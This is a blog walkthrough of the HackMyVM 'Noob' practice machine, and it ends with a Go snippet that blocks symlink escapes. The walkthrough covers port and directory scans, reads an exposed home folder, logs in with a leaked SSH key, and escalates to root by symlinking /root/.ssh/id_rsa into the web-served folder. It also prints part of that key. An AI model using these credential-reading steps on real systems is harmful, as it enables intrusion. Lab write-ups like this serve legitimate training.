Windy's little blog

All the odds and ends of everyday life, and I like CTF.

HackMyVm Noob Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Noob

Scan ports.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for secret.vinci.hmv (192.168.56.100)
 Host is up (0.0010s latency).
 Not shown: 65533 closed ports
 PORT      STATE SERVICE VERSION
 22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 66:6a:8e:22:cd:dd:75:52:a6:0a:46:06:bc:df:53:0f (RSA)
 |   256 c2:48:46:33:d4:fa:c0:e7:df:de:54:71:58:89:36:e8 (ECDSA)
 |_  256 5e:50:90:71:08:5a:88:62:7e:81:07:c3:9a:c1:c1:c6 (ED25519)
 65530/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
 |_http-title: Site doesn't have a title (text/plain; charset=utf-8).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Check 65530 http.

 ~ curl http://192.168.56.100:65530
 404 page not found

Try /index.

 ~ curl http://192.168.56.100:65530/index
 Hi, You are close!

Scan directories. Because there are too many fake responses, we omit file extensions.

 ~ gobuster dir -u http://192.168.56.100:65530 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt   -b 401,403,404,500 --wildcard   -o 65530.log
 ...
 ===============================================================
 /index                (Status: 200) [Size: 19]
 /http%3A%2F%2Fwww     (Status: 301) [Size: 45] [--> /http:/www]
 /http%3A%2F%2Fyoutube (Status: 301) [Size: 49] [--> /http:/youtube]
 /http%3A%2F%2Fblogs   (Status: 301) [Size: 47] [--> /http:/blogs]
 /http%3A%2F%2Fblog    (Status: 301) [Size: 46] [--> /http:/blog]
 /**http%3A%2F%2Fwww   (Status: 301) [Size: 51] [--> /%2A%2Ahttp:/www]
 /http%3A%2F%2Fcommunity (Status: 301) [Size: 51] [--> /http:/community]
 /http%3A%2F%2Fradar   (Status: 301) [Size: 47] [--> /http:/radar]
 /http%3A%2F%2Fjeremiahgrossman (Status: 301) [Size: 58] [--> /http:/jeremiahgrossman]
 /http%3A%2F%2Fweblog  (Status: 301) [Size: 48] [--> /http:/weblog]
 /http%3A%2F%2Fswik    (Status: 301) [Size: 46] [--> /http:/swik]
 /nt4share             (Status: 301) [Size: 45] [--> /nt4share/]
 ===============================================================

Notice the last entry, /nt4share. Check it.

 ~ curl http://192.168.56.100:65530/nt4share/
 <pre>
 <a href=".Xauthority">.Xauthority</a>
 <a href=".bash_history">.bash_history</a>
 <a href=".bash_logout">.bash_logout</a>
 <a href=".bashrc">.bashrc</a>
 <a href=".profile">.profile</a>
 <a href=".ssh/">.ssh/</a>
 <a href="linpeas.sh">linpeas.sh</a>
 <a href="pspy64">pspy64</a>
 </pre>

It's a user's home folder. From .bash_history, we get a user name, "adela".

 ~ curl http://192.168.56.100:65530/nt4share/.bash_history
 ...
 ls -la /opt
 find / -user adela 2>/dev/null
 ...

From .ssh/, we download id_rsa and log in over SSH as user adela.

 ~ chmod 600 id_rsa
 ~ ssh adela@192.168.56.100 -i id_rsa
 ...
 adela@noob:~$ id
 uid=1000(adela) gid=1000(adela) groups=1000(adela),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

The last step is tricky. We enumerated a lot but still could not find the way to root.

The web server on port 65530 serves adela's home folder and runs with enough privilege to read root's files, so it follows symlinks. Create a symbolic link to /root/.ssh/id_rsa inside the home folder, then read it through HTTP.

 adela@noob:~$ ln -s /root/.ssh/id_rsa /home/adela/
 ...
 ~ curl http://192.168.56.100:65530/nt4share/id_rsa
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
 ...
 ZxNBqOXEOeZrCUy6ujhX4HeLih7BElkYwZEKvVbJti/I0RsdcbYGWlAPPBvi/8jZnQ7xaT
 T7Qx+xDGFV1hJakGHwAAAAlyb290QG5vb2I=
 -----END OPENSSH PRIVATE KEY-----
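The escalation works because the Go file server follows a symlink placed in the shared home folder and reads the target with its own (root) privileges. As an added example, not code from the machine or the original post, the following Go net/http server resolves each request to its real path and refuses anything that lands outside the served directory; ResolveWithinRoot, SafeFileServer and the ./nt4share path are assumed names.

```go
package main

import (
	"errors"
	"fmt"
	"net/http"
	"os"
	"path/filepath"
	"strings"
)

var errOutsideRoot = errors.New("path resolves outside served root")

// ResolveWithinRoot maps a request path onto the served directory, then
// resolves symlinks. A link like /home/adela/id_rsa -> /root/.ssh/id_rsa
// resolves outside root and is rejected; plain http.FileServer would
// follow it with whatever privileges the server process holds.
func ResolveWithinRoot(root, reqPath string) (string, error) {
	absRoot, err := filepath.Abs(root)
	if err != nil {
		return "", err
	}
	if absRoot, err = filepath.EvalSymlinks(absRoot); err != nil {
		return "", err
	}
	// Clean the request path first so ".." segments cannot escape root.
	clean := filepath.Join(absRoot, filepath.FromSlash(filepath.Clean("/"+reqPath)))
	real, err := filepath.EvalSymlinks(clean) // fails for missing files too
	if err != nil {
		return "", err
	}
	if real != absRoot && !strings.HasPrefix(real, absRoot+string(os.PathSeparator)) {
		return "", errOutsideRoot
	}
	return real, nil
}

// SafeFileServer wraps http.FileServer with the symlink check above.
func SafeFileServer(root string) http.Handler {
	fs := http.FileServer(http.Dir(root))
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if _, err := ResolveWithinRoot(root, r.URL.Path); err != nil {
			http.NotFound(w, r) // same answer for traversal, escape and absence
			return
		}
		fs.ServeHTTP(w, r)
	})
}

func main() {
	// Serve the share on the machine's port; run this as an unprivileged user.
	fmt.Println(http.ListenAndServe(":65530", http.StripPrefix("/nt4share", SafeFileServer("./nt4share"))))
}
```

Dropping privileges before serving is still the primary fix; the path check only limits what a symlink can expose when that is not done.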
